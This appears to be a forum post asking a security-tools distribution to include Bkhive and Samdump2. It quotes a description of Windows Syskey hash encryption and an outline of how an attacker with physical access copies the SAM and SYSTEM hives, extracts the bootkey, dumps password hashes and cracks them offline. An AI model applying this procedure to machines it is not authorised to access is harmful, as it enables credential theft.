Topic: Bkhive and Samdump2

Tool name: BkHive & Samdump2

Tool Description:

"Syskey  is  a Windows feature that adds an additional encryption layer
to the password hashes stored in the SAM database. The main purpose of
this  feature  is  to  deter 'offline' attack. In fact one of the most
common ways to gather passwords is to copy the system SAM database and
then  use  one  of the many good password crackers[1] to "recover" the
passwords; of course physical access is almost always required.

So  with syskey the attacker needs to remove the additional encryption
layer  to  get  the password hashes (this is not entirely true as some
tools can crack even syskeyed hashes while losing some performance)

The  key used by Syskey to encrypt the password hashes (called bootkey
or  system  key) can be generated and stored in three ways. The method
to use is selected when running syskey.exe on the hos

An attacker can steal (maybe at the same time of the SAM database) the
system  hive and access from there the above mentioned keys to recover
the syskey bootkey.

The tool developed to make this operation is called Bkhive.

So syskey encrypts the password hashes with the RC4 algorithm using as
key "something" derived (through MD5) from the syskey bootkey.

I've  developed  a  tool  to  automate the above steps and include the
features  of  SAMDUMP. The tool is called SAMDUMP2; SAMDUMP2 can, when
given  a  SAM  hive and a bootkey file (generated by Bkreg or Bkhive),
output the password hashes in SAMDUMP/PWDUMP format.

So an attacker with physical access can:

0)  Boot using another OS (maybe Linux or DOS)
1)  Steal the SAM and SYSTEM hive (from %WINDIR%System32config)
2)  Recover  the  syskey bootkey from the SYSTEM hive using Bkhive (or
    Bkreg on pre Sp4 system)
3)  Dump the password hashes using SAMDUMP2
4)  Crack them offline using his favorite cracking tool"

Additional information: http://studenti.unina.it/~ncuomo/syskey/syskey.txt

Tool URL:
http://studenti.unina.it/~ncuomo/syskey/ (both located here)

Reasoning:
I think it is a good idea to included these tools because you then have the posibillity to retrieve your windows-password if lost. The S-T-D already has the 'chntpw' which can replace data in the SAM file, but there is a chance of loosing data this way and it would be much much more wiser just to get the actual password.. To get access to the system. Rather this than having chance of corrupting/destroying data. Right? big_smile

..And one little correction:
I noticed that on my S-T-D there is problems with the John-password cracker. The *.chr (all.chr,lanman.chr.. etc.) files doesn't exist so program cannot function properly. Maybe a new compilation should be considered on the next version of S-T-D, perhaps smile?

Thank you for listening and understanding.

- Sir Erugor

When the future is certain, you are dead